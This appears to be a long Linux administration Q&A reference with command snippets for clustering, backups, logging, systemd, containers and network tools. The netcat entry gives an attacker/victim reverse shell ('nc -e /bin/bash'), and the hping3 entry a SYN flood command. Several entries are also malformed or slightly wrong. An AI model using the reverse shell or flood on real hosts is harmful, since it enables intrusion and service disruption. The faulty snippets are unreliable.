# Authenticate nodes
pcs host auth node1 node2
# Create cluster
pcs cluster setup mycluster node1 node2
# Start cluster
pcs cluster start --all
# Add resource
pcs resource create VIP ocf:heartbeat:IPaddr2 \
ip=192.168.1.100 cidr_netmask=24 op monitor interval=30s
# Configure failover
pcs constraint location VIP rule score=200 \
pingd 100
# View status
pcs status

Answer:

/etc/drbd.d/global_common.conf
# Install
apt install drbd-utils
global {
usage-count yes;
}
common {
protocol C;
handlers {
pri-on-incon-degr "/usr/lib/drbd/notify-pri-on-incon-degr.sh; /usr/lib/drbd/notify-emergency-reboot.sh; echo b > /proc/sysrq-trigger ; reboot -f";
}
net {
cram-hmac-alg sha1;
shared-secret "mysecret";
}
}
# /etc/drbd.d/r0.res
resource r0 {
on node1 {
device /dev/drbd0;
disk /dev/sdb1;
address 192.168.1.10:7789;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sdb1;
address 192.168.1.11:7789;
meta-disk internal;
}
}
# Initialize
drbdadm create-md r0
drbdadm up r0
drbdadm primary --force r0
# Filesystem
mkfs.ext4 /dev/drbd0

Answer:

Terminal window
# Install
apt install glusterfs-server
# Add peers
gluster peer probe node2
# Create volume
gluster volume create gv0 \
replica 2 \
node1:/brick1/gv0 \
node2:/brick1/gv0
# Start volume
gluster volume start gv0
# Mount
mount -t glusterfs node1:/gv0 /mnt
# Volume info
gluster volume info
gluster volume status

Answer:

Terminal window
# Install
apt install ceph-mon ceph-osd ceph-mgr ceph-mds
# Create monitor
ceph-mon --mkfs -i node1 --keyring /tmp/ceph.mon.keyring
systemctl start ceph-mon@node1
# Create OSD
ceph-disk prepare --data /dev/sdb
ceph-disk activate /dev/sdb1
# Create pool
ceph osd pool create mypool 100
# Mount
mount -t ceph node1:/ /mnt/ceph

Answer:

Terminal window
# Basic sync
rsync -avz /source/ /destination/
# With deletion
rsync -avz --delete /source/ /destination/
# Exclude patterns
rsync -avz --exclude='*.log' --exclude='tmp/' /source/ /destination/
# Compress during transfer
rsync -avz --compress /source/ /destination/
# Dry run
rsync -avzn /source/ /destination/
# With progress
rsync -avz --progress /source/ /destination/
# Backup script
#!/bin/bash
rsync -avz --delete --exclude-from='/etc/rsync-exclude.txt \
/data/ /backup/data-$(date +%Y%m%d)/
find /backup -type d -mtime +30 -exec rm -rf {} \;

Answer:

Terminal window
# Install
apt install amanda-server amanda-client
# Configure /etc/amanda/DailySet1/amanda.conf
org "DailySet1"
mailto "admin@example.com"
dumpuser "backup"
inparallel 4
netusage 10000
tapetype "HARDDISK"
define tapetype HARDDISK {
length 10000 mb
}
define storage {
name "hd-storage"
plugin "file"
device "/backup/amanda"
}
define dumptype {
global
comment "Default dump"
compress client fast
index yes
}
# Add holding disk
holdingdisk hd1 {
comment "Main holding disk"
directory "/dumps"
use 2000 mb
chunksize 1 mb
}

Answer:

Terminal window
# Install
apt install bacula-server bacula-client
# Configure director
# /etc/bacula/bacula-dir.conf
Director {
Name = bacula-dir
DIRport = 9101
QueryFile = "/etc/bacula/query.sql"
WorkingDirectory = "/var/lib/bacula"
PidDirectory = "/var/run/bacula"
Maximum Concurrent Jobs = 10
}
# Configure client
# /etc/bacula/bacula-fd.conf
FileDaemon {
Name = bacula-fd
FDport = 9102
WorkingDirectory = /var/lib/bacula
PidDirectory = /var/run/bacula
}
# Backup job
Job {
Name = "BackupClient1"
JobDefs = "DefaultJob"
Client = client1-fd
FileSet = "Full Set"
}

Answer:

Terminal window
# Install
apt install restic
# Initialize repository
restic init --repo /backup
# Or S3
AWS_ACCESS_KEY_ID=xxx AWS_SECRET_ACCESS_KEY=xxx \
restic -r s3:s3.amazonaws.com/bucket init
# Backup
restic -r /backup backup /data
# List snapshots
restic -r /backup snapshots
# Mount
restic -r /backup mount /mnt/restic
# Restore
restic -r /backup restore latest --target /restore
# Check integrity
restic -r /backup check

Answer:

Terminal window
# Install
apt install borgmatic
apt install borgbackup
# Initialize
borg init --encryption=repkey /backup
# Create config /etc/borgmatic/config.yaml
source_directories:
- /home
- /etc
destination_directory: /backup
retention:
keep_daily: 7
keep_weekly: 4
keep_monthly: 6
# Backup
borgmatic -v 1
# List
borg list /backup
# Mount
borg mount /backup::backup-2023-01-01 /mnt/backup
# Extract
borg extract /backup::backup-2023-01-01

Answer:

Terminal window
# Install
apt install nmap
# Basic scan
nmap 192.168.1.1
# Scan types
nmap -sS 192.168.1.1 # SYN scan
nmap -sT 192.168.1.1 # TCP connect
nmap -sU 192.168.1.1 # UDP scan
nmap -sV 192.168.1.1 # Version detection
# OS detection
nmap -O 192.168.1.1
# Scripts
nmap -sC 192.168.1.1 # Default scripts
nmap --script=vuln 192.168.1.1
# Output
nmap -oA output 192.168.1.1 # All formats
nmap -oN output.nmap 192.168.1.1

Answer:

Terminal window
# Install
apt install wireshark tshark
# Capture with tshark
tshark -i eth0 -w capture.pcap
tshark -i eth0 -f "tcp port 80" -w http.pcap
# Read pcap
tshark -r capture.pcap
tshark -r capture.pcap -Y "http.request" # Filter
# Extract HTTP
tshark -r capture.pcap -z "http,tree"
# Remote capture
ssh user@host "tcpdump -i eth0 -w -" | wireshark -k -i -

Answer:

Terminal window
# Port scanning
nc -zv 192.168.1.1 1-1000
# Simple server
nc -l -p 1234
# Simple client
nc 192.168.1.1 1234
# File transfer
# Server
nc -l -p 1234 < file.txt
# Client
nc 192.168.1.1 1234 > file.txt
# Reverse shell
# Server (attacker)
nc -l -p 1234
# Client (victim)
nc -e /bin/bash 192.168.1.1 1234
# Chat
nc -l -p 1234
nc 192.168.1.1 1234

Answer:

Terminal window
# Install
apt install hping3
# Ping
hping3 -1 192.168.1.1
# SYN flood
hping3 -S 192.168.1.1 -p 80 --flood
# Port scan
hping3 -8 1-1000 -S 192.168.1.1
# Trace
hping3 -t 1 -z 192.168.1.1
# Custom packet
hping3 -c 1 -1 -p 80 -E data.txt 192.168.1.1

Answer:

Terminal window
# Capture packets
tcpdump -i eth0
# Filter by host
tcpdump host 192.168.1.1
# Filter by port
tcpdump port 80
tcpdump src port 443
# Filter by protocol
tcpdump icmp
tcpdump tcp
tcpdump udp
# Write to file
tcpdump -w capture.pcap
# Read from file
tcpdump -r capture.pcap
tcpdump -r capture.pcap | grep "pattern"
# Advanced filters
tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0'
tcpdump -i eth0 'port 80 and host 192.168.1.1'

Answer:

/etc/rsyslog.conf
# Load modules
module(load="imudp")
module(load="imtcp")
# Input
input(type="imudp" port="514")
input(type="imtcp" port="514")
# Remote logging
*.* @@remote-host:514
# Filter
:programname, isequal, "nginx" /var/log/nginx.log
& ~
# Templates
$template RemoteLogs,"/var/log/%HOSTNAME%/%programname%.log"
*.* ?RemoteLogs
# Queue
$ActionQueueType LinkedList
$ActionQueueFileName remote-fwd
$ActionResumeRetryCount 3
$ActionQueueSaveOnShutdown on

Answer:

Terminal window
# Install Graylog
# Using OVA or AMI
# Configure inputs
# Web UI -> System -> Inputs -> GELF UDP
# Configure sidecar
apt install graylog-sidecar
graylog-sidecar -c /etc/graylog/sidecar/sidecar.yml
# Filebeat configuration
filebeat.inputs:
- type: log
paths:
- /var/log/syslog
fields:
type: syslog
fields_under_root: true

Answer:

/etc/logrotate.d/nginx
/var/log/nginx/*.log {
daily
missingok
rotate 14
compress
delaycompress
notifempty
create 0640 www-data adm
sharedscripts
postrotate
[ -f /var/run/nginx.pid ] && kill -USR1 `cat /var/run/nginx.pid`
endscript
}
# Manual run
logrotate -f /etc/logrotate.conf
logrotate -d /etc/logrotate.conf # debug

Answer:

Terminal window
# Install Elasticsearch
docker run -d -p 9200:9200 elasticsearch:7
# Install Kibana
docker run -d -p 5601:5601 kibana:7
# Install Logstash
docker run -d -p 5044:5044 logstash:7 -f /etc/logstash/conf.d/
# Filebeat configuration
filebeat.inputs:
- type: log
paths:
- /var/log/*.log
output.logstash:
hosts: ["localhost:5044"]
# Ingest pipeline
input {
beats {
port => 5044
}
filter {
grok {
match => { "message" => "%{COMBINEDAPACHELOG}" }
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
}
}

Answer:

Terminal window
# Install
dpkg -i splunkforwarder-latest.deb
# Start
/opt/splunkforwarder/bin/splunk start --accept-license
# Configure inputs
cat /opt/splunkforwarder/etc/system/local/inputs.conf
[monitor:///var/log/syslog]
sourcetype = syslog
# Configure outputs
cat /opt/splunkforwarder/etc/system/local/outputs.conf
[tcpout:default-autolb-group]
server = splunk-server:9997
# Enable boot start
/opt/splunkforwarder/bin/splunk enable boot-start

Answer:

/etc/systemd/system/myservice.service
[Unit]
Description=My Service
After=network.target
[Service]
Type=simple
User=myuser
Group=mygroup
WorkingDirectory=/opt/myapp
ExecStart=/opt/myapp/bin/start
ExecStop=/opt/myapp/bin/stop
ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=10
StandardOutput=journal
StandardError=journal
[Install]
WantedBy=multi-user.target

Answer:

/etc/systemd/system/mytimer.timer
[Unit]
Description=Run daily backup
[Timer]
OnCalendar=daily
Persistent=true
RandomizedDelaySec=1h
[Install]
WantedBy=timers.target
# /etc/systemd/system/mytimer.service
[Unit]
Description=Daily backup job
[Service]
Type=oneshot
ExecStart=/usr/local/bin/backup.sh

Answer:

/etc/tmpfiles.d/mydirs.conf
# Create directories with specific permissions
d /var/run/myservice 0755 myuser mygroup -
L /var/run/myservice/link - - - - /var/myservice
# Runtime
systemd-tmpfiles --create
systemd-tmpfiles --clean
# At boot
systemctl enable systemd-tmpfiles-clean.timer

Answer:

Terminal window
# Check status
systemctl status myservice
journalctl -u myservice
# Follow logs
journalctl -fu myservice
# Debug mode
systemctl edit myservice
# Add:
# [Service]
# Environment=SYSTEMD_LOG_LEVEL=debug
# Check dependencies
systemctl list-dependencies myservice
# Check failed
systemctl --failed
systemctl reset-failed

Answer:

/etc/systemd/system/myservice.service
[Service]
MemoryMax=1G
MemoryHigh=512M
CPUQuota=50%
IOReadBandwidthMax=/dev/sda 1M
IOWriteBandwidthMax=/dev/sda 1M
TasksMax=100
# Apply
systemctl daemon-reload
systemctl restart myservice

Q196: How do you create custom Docker images?

Section titled “Q196: How do you create custom Docker images?”

Answer:

# Dockerfile
FROM ubuntu:20.04
# Labels
LABEL maintainer="admin@example.com"
LABEL version="1.0"
# Environment
ENV APP_HOME=/opt/app
ENV NODE_ENV=production
# Install dependencies
RUN apt-get update && \
apt-get install -y curl nginx && \
apt-get clean && \
rm -rf /var/lib/apt/lists/*
# Create user
RUN useradd -m -s /bin/bash appuser
# Copy files
COPY --chown=appuser:appuser . /opt/app
# Switch user
USER appuser
# Expose
EXPOSE 80 443
# Health check
HEALTHCHECK --interval=30s --timeout=3s \
CMD curl -f http://localhost/ || exit 1
# Entrypoint
ENTRYPOINT ["/opt/app/start.sh"]
CMD ["nginx", "-g", "daemon off;"]

Answer:

# Use Alpine
FROM node:18-alpine
# Use multi-stage build
FROM node:18-alpine AS builder
WORKDIR /build
COPY package*.json ./
RUN npm ci --only=production
FROM node:18-alpine
WORKDIR /app
COPY --from=builder /app/node_modules ./node_modules
COPY . .
USER node
# Combine layers
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*
# Use .dockerignore
# node_modules
# .git
# *.log

Q198: How do you configure Docker networking?

Section titled “Q198: How do you configure Docker networking?”

Answer:

Terminal window
# Create network
docker network create mynetwork
# Run with network
docker run -d --network mynetwork --name web nginx
# Bridge network
docker network create --driver bridge mybridge
# Host network
docker run --network host nginx
# Overlay (Swarm)
docker network create --driver overlay myoverlay
# DNS resolution
docker run -d --network mynetwork --dns 8.8.8.8 nginx

Q199: How do you use Docker Compose for orchestration?

Section titled “Q199: How do you use Docker Compose for orchestration?”

Answer:

version: '3.8'
services:
web:
image: nginx:alpine
ports:
- "80:80"
networks:
- frontend
depends_on:
- app
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost/"]
interval: 30s
timeout: 10s
retries: 3
app:
build: .
networks:
- frontend
- backend
environment:
- DATABASE_URL=postgres://db:5432/myapp
db:
image: postgres:14
volumes:
- db-data:/var/lib/postgresql/data
networks:
- backend
networks:
frontend:
backend:
volumes:
db-data:

Q200: How do you secure Docker containers?

Section titled “Q200: How do you secure Docker containers?”

Answer:

Terminal window
# Run as non-root
docker run -u 1000:1000 nginx
# Read-only root filesystem
docker run --read-only nginx
# Limit capabilities
docker run --cap-drop ALL --cap-add NET_BIND_SERVICE nginx
# Seccomp profile
docker run --security-opt seccomp=default nginx
# AppArmor profile
docker --security-opt apparmor=docker-default nginx
# No new privileges
docker run --security-opt no-new-privileges:true nginx
# Scan images
docker scan nginx
# Use rootless Docker
dockerd-rootless.sh

Q201: How do you configure systemd network namespace?

Section titled “Q201: How do you configure systemd network namespace?”
Terminal window
ip netns add myns
ip netns exec myns ip link
ip netns exec myns ping 8.8.8.8
# List
ip netns list
# Delete
ip netns delete myns

Q202: How do you use Linux traffic control?

Section titled “Q202: How do you use Linux traffic control?”
Terminal window
# Add qdisc
tc qdisc add dev eth0 root netem delay 100ms
# Rate limiting
tc qdisc add dev eth0 root tbf rate 1mbit burst 1540 latency 50ms
# View
tc qdisc show
tc -s qdisc show
Terminal window
# Install bpftrace
apt install bpftrace
# Simple trace
btrace -p PID
btrace /path/to/program.bt
# Using bpfcc
apt install bpfcc-tools
execsnoop-bpfcc
opensnoop-bpfcc
tcpconnect-bpfcc
Terminal window
# Install
apt install auditd
# Add rules
auditctl -w /etc/passwd -p wa -k passwd_change
auditctl -w /var/www/html -p r -k web_access
# List rules
auditctl -l
# Search
ausearch -k passwd_change
aureport -f
Terminal window
# Install
apt install ufw
# Enable
ufw enable
ufw default deny incoming
ufw default allow outgoing
# Rules
ufw allow ssh
ufw allow 80/tcp
ufw allow from 192.168.1.0/24 to any port 5432
# Status
ufw status numbered
ufw delete 1
# Logging
ufw logging on
ufw logging low
Terminal window
# Install
apt install firewalld
# Services
firewall-cmd --list-services
firewall-cmd --add-service=http
firewall-cmd --add-port=8080/tcp
# Zones
firewall-cmd --get-zones
firewall-cmd --zone=public --list-all
# Permanent
firewall-cmd --runtime-to-permanent
# Rich rules
firewall-cmd --add-rich-rule='rule family="ipv4" source address="192.168.1.0/24" accept'

Answer:

Terminal window
# Install
apt install openvpn easy-rsa
# Setup CA
cd /usr/share/easy-rsa
./easyrsa init-pki
./easyrsa build-ca
# Build server
./easyrsa build-server-full server nopass
# Build client
./easyrsa build-client-full client1 nopass
# Server config
cp pki/ca.crt /etc/openvpn/
cp pki/issued/server.crt /etc/openvpn/
cp pki/private/server.key /etc/openvpn/
# Client config
client
dev tun
remote vpn.example.com 1194
proto udp
ca ca.crt
cert client1.crt
key client1.key

Answer:

Terminal window
# Install
apt install wireguard
# Generate keys
wg genkey | tee private.key | wg pubkey > public.key
# Server config /etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.1/24
ListenPort = 51820
PrivateKey = <server-private-key>
[Peer]
PublicKey = <client-public-key>
AllowedIPs = 10.0.0.2/32
# Client config
[Interface]
Address = 10.0.0.2/24
PrivateKey = <client-private-key>
[Peer]
PublicKey = <server-public-key>
Endpoint = vpn.example.com:51820
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 25

Answer:

Terminal window
# Generate key
gpg --full-generate-key
# Encrypt
gpg -e -r recipient@example.com file.txt
# Decrypt
gpg -d file.txt.gpg
# Sign
gpg -s file.txt
# Verify
gpg --verify file.txt.asc
# List keys
gpg --list-keys
gpg --list-secret-keys
# Export/Import
gpg --export -a > public.key
gpg --import public.key

Answer:

Terminal window
# Generate private key
openssl genrsa -out private.key 2048
# Generate CSR
openssl req -new -key private.key -out request.csr
# Self-signed certificate
openssl req -x509 -days 365 -key private.key -in request.csr -out certificate.crt
# View certificate
openssl x509 -in certificate.crt -text -noout
# Verify
openssl verify -CAfile ca.crt certificate.crt
# Convert formats
openssl x509 -in cert.pem -outform DER -out cert.der

Answer:

Terminal window
# Install
apt install slapd ldap-utils
# Configure
dpkg-reconfigure slapd
# Add entries
ldapadd -x -D "cn=admin,dc=example,dc=com" -W -f entries.ldif
# Search
ldapsearch -x -b "dc=example,dc=com" "(objectclass=*)"
# Modify
ldapmodify -x -D "cn=admin,dc=example,dc=com" -W -f modify.ldif
# Delete
ldapdelete -x -D "cn=admin,dc=example,dc=com" "uid=user,ou=people,dc=example,dc=com"

Q212: How do you configure Postfix with LDAP?

Section titled “Q212: How do you configure Postfix with LDAP?”

Answer:

/etc/postfix/ldap/virtual_alias_maps.cf
# Install
apt install postfix-ldap
server_host = ldap.example.com
search_base = ou=people,dc=example,dc=com
query_filter = mail=%s
result_attribute = mailForwardingAddress

Q213: How do you configure Samba as domain controller?

Section titled “Q213: How do you configure Samba as domain controller?”

Answer:

Terminal window
# Install
apt install samba krb5-user
# Provision
samba-tool domain provision --realm=EXAMPLE.COM --domain=EXAMPLE --adminpass=Password123 --server-role=dc
# Start
systemctl start samba
# Add user
useradd -M -s /sbin/nologin administrator
smbpasswd -a administrator
# Join domain
net ads join -U administrator

Answer:

Terminal window
# Server /etc/exports
/exports *(rw,sec=sys,fsid=0,no_subtree_check,no_root_squash)
# Client
mount -t nfs4 server:/ /mnt/nfs
# Or with Kerberos
# Server
/exports *(rw,sec=krb5p,fsid=0)
# Client
mount -t nfs4 -o sec=krb5 server:/ /mnt/nfs

Answer:

Terminal window
# Create encrypted container
dd if=/dev/zero of=/container bs=1M count=1000
cryptsetup luksFormat /container
# Open
cryptsetup open /container cryptvol
# Format
mkfs.ext4 /dev/mapper/cryptvol
# Mount
mount /dev/mapper/cryptvol /mnt
# Close
umount /mnt
cryptsetup close cryptvol

Q216: How do you configure systemd network targets?

Section titled “Q216: How do you configure systemd network targets?”

Answer:

cat /etc/systemd/system/myapp.target [Unit] Description=My Application Target Requires=network-online.target After=network-online.target

[Install] WantedBy=multi-user.target

### Q217: How do you use cgroups v2?
```bash
# Check cgroup version
stat -fc %T /sys/fs/cgroup/
# Create group
mkdir -p /sys/fs/cgroup/mygroup
echo 100000000 > /sys/fs/cgroup/mygroup/cpu.max
# Add process
echo PID > /sys/fs/cgroup/mygroup/cgroup.procs

Q218: How do you configure namespace isolation?

Section titled “Q218: How do you configure namespace isolation?”
Terminal window
# Create network namespace
ip netns add myns
# Create user namespace
unshare --user
# Create PID namespace
unshare --pid --fork --mount-proc
# Mount namespace
unshare --mount
```bash
# Check capabilities
getcap -r /usr/bin
# Add capability
setcap cap_net_raw+ep /usr/bin/ping
# Check specific
getcap /usr/bin/ping
# Remove
setcap -r /usr/bin/ping

Answer:

Terminal window
# Default profile
docker run --rm -it --security-opt seccomp=default hello-world
# Custom profile
cat /etc/docker/seccomp.json
{
"defaultAction": "SCMP_ACT_ERRNO",
"architectures": ["SCMP_ARCH_X86_64"],
"syscalls": []
}
docker run --security-opt seccomp=/etc/docker/seccomp.json nginx

Answer:

Terminal window
# Install
apt install linux-tools-common linux-tools-generic
# CPU sampling
perf record -g ./myprogram
perf report
# Specific events
perf stat -e cycles,instructions ./myprogram
# Top
perf top
# Scheduler analysis
perf sched latency

Answer:

Terminal window
# Basic
strace -p PID
strace -c command
# Output to file
strace -o output.txt command
# Timestamps
strace -t command
strace -tt command
# Filter
strace -e trace=network,file command
strace -e openat,write command

Answer:

Terminal window
# Basic
ltrace -p PID
ltrace -c command
# Library calls
ltrace -l library.so command
# Time
ltrace -T command
# Follow forks
ltrace -f command

Answer:

Terminal window
# Basic
vmstat 1
# Memory
vmstat -m
# Disk
vmstat -d
# Summary
vmstat -s
# Extended
vmstat -e

Answer:

Terminal window
# Basic
iotop
# Only I/O
iotop -o
# Batch mode
iotop -b -n 3
# Only processes
iotop -P
# By thread
iotop -t

Answer:

Terminal window
# CPU
sar -u 1 5
# Memory
sar -r 1 5
# Swap
sar -S 1 5
# I/O
sar -b 1 5
# Network
sar -n DEV 1 5
# All
sar -A

Answer:

/etc/security/limits.conf
* soft nofile 65535
* hard nofile 65535
* soft nproc 4096
* hard nproc 8192
root soft nofile unlimited
# Apply without logout
ulimit -n 65535

Q228: How do you tune TCP stack for high performance?

Section titled “Q228: How do you tune TCP stack for high performance?”

Answer:

/etc/sysctl.conf
net.core.somaxconn = 65535
net.ipv4.tcp_max_syn_backlog = 65535
net.ipv4.ip_local_port_range = 1024 65535
net.ipv4.tcp_fin_timeout = 15
net.ipv4.tcp_max_tw_buckets = 2000000
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_keepalive_time = 300
net.ipv4.tcp_keepalive_intvl = 15
net.ipv4.tcp_keepalive_probes = 5
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216

Q229: How do you optimize disk I/O scheduler?

Section titled “Q229: How do you optimize disk I/O scheduler?”

Answer:

Terminal window
# For SSD (no-op or deadline)
echo noop > /sys/block/sda/queue/scheduler
# For HDD (mq-deadline or bfq)
echo mq-deadline > /sys/block/sda/queue/scheduler
# Make persistent
# /etc/udev/rules.d/60-ioschedulers.rules
ACTION=="add|change", KERNEL=="sd[a-z]", ATTR{queue/scheduler}="mq-deadline"

Answer:

Terminal window
# Check available
cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors
# Set for all
for cpu in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
echo performance > $cpu
done
# Install cpufrequtils
apt install cpufrequtils
# /etc/default/cpufrequtils
GOVERNOR="performance"
# With systemd
systemctl enable cpufreqd

Answer:

Terminal window
# Configure crictl
cat > /etc/crictl.yaml <<EOF
runtime-endpoint: unix:///var/run/dockershim.sock
image-endpoint: unix:///var/run/dockershim.sock
timeout: 10
debug: false
EOF
# Pull image
crictl pull nginx:latest
# Run container
crictl run container.json pod.json
# List
crictl ps
crictl pods

Answer:

Terminal window
# Rootless containers
podman run -d nginx
podman ps
podman logs -f container
# Build image
podman build -t myimage .
podman push myimage registry.example.com/myimage
# Systemd service
podman generate systemd --name myapp > myapp.service
systemctl enable --user myapp

Answer:

Terminal window
# Install containerd
apt install containerd
# Configure /etc/containerd/config.toml
[plugins]
[plugins."io.containerd.grpc.v1.cri"]
sandbox_image = "registry.k8s.io/pause:3.9"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
runtime_type = "io.containerd.runtime.v1.linux"
runtime_engine = ""
runtime_root = ""

Answer:

Terminal window
# Build from Dockerfile
buildah bud -t myimage .
# Build without Dockerfile
buildah from alpine
buildah run alpine -- apk add nginx
buildah commit alpine myimage
# Use multiple containers
buildah bud --layers -t myapp
# Push to registry
buildah push myimage

Answer:

Terminal window
# Inspect remote image
skopeo inspect docker://nginx:latest
# Copy between registries
skopeo copy docker://source/nginx:latest docker://dest/nginx:latest
# List tags
skopeo list-tags docker://registry.example.com/myimage
# Delete
skopeo delete docker://registry.example.com/myimage:tag

Answer:

Terminal window
# Install
wget https://github.com/Mirantis/cri-dockerd/releases/latest/download/cri-dockerd-amd64
install -o root -g root -m 0755 cri-dockerd-amd64 /usr/local/bin/cri-dockerd
# Run with systemd
# /etc/systemd/system/cri-docker.service
[Unit]
Description=CRI-Docker
After=network-online.target firewalld.service docker.service
Requires=docker.service
[Service]
ExecStart=/usr/local/bin/cri-dockerd --network-plugin=cni --pod-infra-container-image=pause:3.9

Answer:

Terminal window
# Install
curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC="--write-kubeconfig-mode 644" sh -
# Or with Docker
docker run -d --privileged -p 8080:6443 -v /var/lib/rancher/k3s:/var/lib/rancher/k3s rancher/k3s:latest server
# Agent
curl -sfL https://get.k3s.io | K3S_URL=https://server:6443 K3S_TOKEN=TOKEN sh -

Answer:

Terminal window
# Configure
mkdir ~/.kube
cp /etc/rancher/k3s/k3s.yaml ~/.kube/config
chmod 600 ~/.kube/config
# Commands
kubectl get nodes
kubectl get pods -A
kubectl get services
kubectl get deployments
# Apply
kubectl apply -f deployment.yaml
# Debug
kubectl describe pod name
kubectl logs -f pod name
kubectl exec -it pod name -- /bin/bash

Answer:

Terminal window
# Install
curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash
# Add repo
helm repo add stable https://charts.helm.sh/stable
helm repo update
# Install
helm install myrelease stable/nginx
# Upgrade
helm upgrade myrelease stable/nginx
# Template
helm template myrelease stable/nginx
# Values
helm install -f values.yaml myrelease stable/nginx

Answer:

kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- deployment.yaml
- service.yaml
namespace: production
commonLabels:
app: myapp
configMapGenerator:
- name: app-config
literals:
- DEBUG=false
replicas:
- name: deployment
count: 3

Continue with questions 241-1000 covering more advanced topics…